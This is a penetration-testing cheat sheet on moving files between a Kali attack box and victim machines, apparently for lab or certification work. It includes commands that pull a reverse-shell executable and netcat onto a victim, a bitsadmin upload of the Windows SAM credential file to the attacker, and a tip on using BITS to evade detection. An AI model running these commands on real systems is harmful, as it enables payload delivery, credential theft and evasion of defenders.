File Transfer

Cheat sheet for transferring (downloading/uploading) files between machines.

💡 On Windows, C:\ProgramData is often writable.

Web server

💡 Use updog, a replacement for SimpleHTTPServer that allows upload!

# Python 2.7
python -m SimpleHTTPServer 80

# Python 3.x
python3 -m http.server 80
sudo service apache2 start

Transfer binary files (convert to ascii)

Optional: Compress binary file

Use an executable packer (PE compression tool). The file is still executable after!

cd /home/kali/share
upx -9 nc.exe

Convert binary file to ascii

exe2hex -x nc.exe -p nc.cmd

Transfer the file using any other method.

Reconstruct the binary file

The last command is in Powershell and will reconstruct the binary file.



pip install pyftpdlib
python -m pyftpdlib -p 21 -w
ftp anonymous@x.x.x.x


Proxy configuration

nano /etc/wgetrc
http_proxy =
use_proxy = on

Download file in current directory

wget -O <local file name> <URL>
wget -O /usr/share/wordlists/quebec.txt "" 

Download folder

wget -r "https://whatever/foldernameendingwithaslash/"


curl -o <local file name> <URL>
curl -o /usr/share/wordlists/quebec.txt ""


Download accelerator.

axel -a -n 20 -o <local file name> <URL>
axel -a -n 20 -o /usr/share/wordlists/quebec.txt ""


See Netcat.


See Powershell Cheat Sheet for more examples.

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://IP/rev.exe','C:\ProgramData\rev.exe')"

scp (secure copy)

scp [OPTION] [user@]SRC_HOST:]file1 [user@]DEST_HOST:]file2
sudo service ssh start

Windows (victim) to Kali

scp -r "C:\path\file.txt" kali@x.x.x.x:/home/kali/

Linux (victim) to Kali

scp -r "/tmp/linpeas.txt" kali@x.x.x.x:/home/kali/

Background Intelligent Transfer Service (BITS) on Windows

💡 Useful to evade detection since BITS is used for Windows Updates.

Download file

bitsadmin /create JOB & bitsadmin /addfile JOB <REMOTE_SRC> <LOCAL_DST> & bitsadmin /resume JOB & timeout /T 10 & bitsadmin /complete JOB
bitsadmin /create JOB & bitsadmin /addfile JOB http://<KALI IP>/nc.exe %TEMP%\Data\nc.exe & bitsadmin /resume JOB & timeout /T 10 & bitsadmin /complete JOB

Upload file

bitsadmin /create /upload JOB & bitsadmin /addfile JOB <REMOTE_DST> <LOCAL_SRC> & bitsadmin /resume JOB & timeout /T 10 & bitsadmin /complete JOB
bitsadmin /create /upload JOB & bitsadmin /addfile JOB http://<KALI IP>/SAM %TEMP\Data\SAM & bitsadmin /resume JOB & timeout /T 10 & bitsadmin /complete JOB


See Impacket.

  • Start SMB server on Kali Linux. See this post.
  • On the Windows machine, copy file from Kali

💡 Supports binary file transfer. SEE ALSO impacket-wmiexec!!

On Kali

sudo impacket-smbserver myshare /home/kali/share

On Windows

net view \\<KALI IP>
dir \\<KALI IP>\<sharename>
copy <source> <destination>
copy <filename> \\<KALI IP>\<sharename>\<filename>
copy \\<KALI IP>\<sharename>\<filename> <filename>

PHP File Upload

On Kali, host a file upload page on Apache Web Server.

sudo mkdir /var/www/html/uploads
sudo chown www-data:www-data /var/www/html/uploads
sudo chmod 766 /var/www/html/uploads
sudo service apache2 start


sudo nano /var/www/html/upload.php
$target_dir = "uploads/";
$target_file = $target_dir . basename($_FILES["targetfile"]["name"]);
move_uploaded_file($_FILES["targetfile"]["tmp_name"], $target_file)


sudo nano /var/www/html/upload.html
<form action="./upload.php" method="POST" enctype="multipart/form-data">
<input type="file" name="targetfile"><br>
<input type="submit" name="submit" value="upload">

On the victim

Open a web browser and go to http://<KALI_IP>/upload.html

powershell (New-Object System.Net.WebClient).UploadFile('http://x.x.x.x/upload.php', 'file.txt')